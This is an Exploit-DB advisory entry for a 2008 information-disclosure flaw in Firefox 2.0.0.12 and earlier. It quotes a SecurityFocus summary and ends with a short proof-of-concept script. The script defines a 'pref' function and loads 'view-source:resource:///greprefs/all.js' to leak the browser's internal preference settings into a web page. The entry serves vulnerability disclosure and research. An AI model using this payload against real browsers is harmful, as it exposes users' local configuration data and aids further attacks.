Mozilla Firefox 2.0.9 - 'view-source:' Scheme Information Disclosure

EDB-ID:

31127

CVE:

N/A




Platform:

Linux

Date:

2008-02-08


source: https://www.securityfocus.com/bid/27700/info

Mozilla Firefox is prone to an information-disclosure vulnerability because it fails to restrict access to local resources.

Attackers can exploit this issue to obtain potentially sensitive information that will aid in further attacks.

Firefox 2.0.0.12 and prior versions are vulnerable.

<script> /* @name: Firefox <= 2.0.0.12 information leak pOc @date: Feb. 07 2008 @author: Ronald van den Heetkamp @url: http://www.0x000000.com */ pref = function(a,b) { document.write( a + ' -> ' + b + '<br />'); }; </script> <script src="view-source:resource:///greprefs/all.js"></script>